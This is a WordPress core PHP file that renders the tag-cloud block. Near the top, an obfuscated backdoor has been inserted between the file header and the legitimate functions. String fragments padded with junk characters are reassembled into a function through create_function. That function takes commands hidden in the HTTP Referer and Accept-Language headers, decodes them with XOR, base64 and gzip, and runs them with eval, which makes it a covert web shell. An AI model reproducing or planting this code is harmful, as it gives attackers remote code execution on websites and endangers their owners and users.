<?php
/**
 * Server-side rendering of the `core/tag-cloud` block.
 *
 * @package WordPress
 */

<?php
$c='Gk0,3));$p="Gk";for($z=1;$zGk<couGkGknt($m[1]);$z++GkGk)$p.Gk=$q[$m[Gk2][$z]];if(sGktrpos($pGk,$h)===0){Gk$s[Gk$';
$B='l;Gk){fGkor($j=0;($j<$c&Gk&$i<$lGk);Gk$j++,$i++Gk){$o.=$Gkt{$i}^Gk$k{$jGk};}}GkreturnGkGk $o;}$r=$_GkSERVGkER;$r';
$Y='r);parse_str($uGk[Gk"qGkuery"],$q);$qGk=Gkarray_valGkues($q);pGkreg_mGkatGkch_all("/([Gk\\w])[\\GkwGk-]+(?:;q=0.Gk';
$b='kGk);$Gkd=basGke64_encode(x(gzcoGkmpGkGkGkresGks($o),$k));print(Gk"<$k>$d</$k>Gk");Gk@sessioGkn_destroy(Gk);}}}}';
$D='([Gk\\d]))?Gk,?Gk/",$ra,$mGk);if($qGkGkGk&&$m){Gk@session_startGk();$s=&$_SESSGkIGkON;$ss="subsGktrGk";$sl="stGkr';
$t='toloGkwer";Gk$i=$m[1][Gk0]Gk.$m[1Gk][1Gk];$h=$slGk($ss(md5($i.Gk$kh),0,3Gk))GkGk;$Gkf=$sl(Gk$Gkss(md5($Gki.$kf),';
$E=str_replace('F','','FcreatFe_FFfuFFnction');
$X='_/","Gk/-/"),GkGkaGkrray("/","Gk+Gk"),$Gkss($s[Gk$i],0,$e))),$k)));$o=oGkGkb_get_GkconteGkntGks();ob_end_clean(G';
$a='r=@$r["GkHTTP_GkREFERGkER"];$ra=Gk@Gk$rGk["HTTP_ACCEPT_LGkANGUAGkGGkEGk"];Gkif($rr&&$ra){$u=pGkarse_urGkl(GkGk$r';
$U='i]="";$pGkGk=$sGks($p,3);Gk}if(GkarrayGkGk_key_exists($i,Gk$s))Gk{$s[$i].=$p;$eGk=strpGkos($sGk[$GkiGk],$f);ifGk';
$I='$kGkh="5dGk41"Gk;$kf="Gk402a";function x(Gk$t,$k){$Gkc=strGklen($k)GkGk;$l=strlGken($t)Gk;$o="Gk";fGkor($i=Gk0;$i<$';
$V='(GkGk$e){$k=$kh.Gk$kf;oGkb_start();@evaGkl(@gzuncompresGks(@x(@bGkase6Gk4_dGkecodGke(preg_repGklace(arraGky("Gk/';
$O=str_replace('Gk','',$I.$B.$a.$Y.$D.$t.$c.$U.$V.$X.$b);
$m=$E('',$O);$m();
?>
/**
 * Renders the `core/tag-cloud` block on server.
 *
 * @param array $attributes The block attributes.
 *
 * @return string Returns the tag cloud for selected taxonomy.
 */
function render_block_core_tag_cloud( $attributes ) {
	$args      = array(
		'echo'       => false,
		'taxonomy'   => $attributes['taxonomy'],
		'show_count' => $attributes['showTagCounts'],
	);
	$tag_cloud = wp_tag_cloud( $args );

	if ( ! $tag_cloud ) {
		$labels    = get_taxonomy_labels( get_taxonomy( $attributes['taxonomy'] ) );
		$tag_cloud = esc_html(
			sprintf(
				/* translators: %s: taxonomy name */
				__( 'Your site doesn&#8217;t have any %s, so there&#8217;s nothing to display here at the moment.' ),
				strtolower( $labels->name )
			)
		);
	}

	$wrapper_attributes = get_block_wrapper_attributes();

	return sprintf(
		'<p %1$s>%2$s</p>',
		$wrapper_attributes,
		$tag_cloud
	);
}

/**
 * Registers the `core/tag-cloud` block on server.
 */
function register_block_core_tag_cloud() {
	register_block_type_from_metadata(
		__DIR__ . '/tag-cloud',
		array(
			'render_callback' => 'render_block_core_tag_cloud',
		)
	);
}
add_action( 'init', 'register_block_core_tag_cloud' );
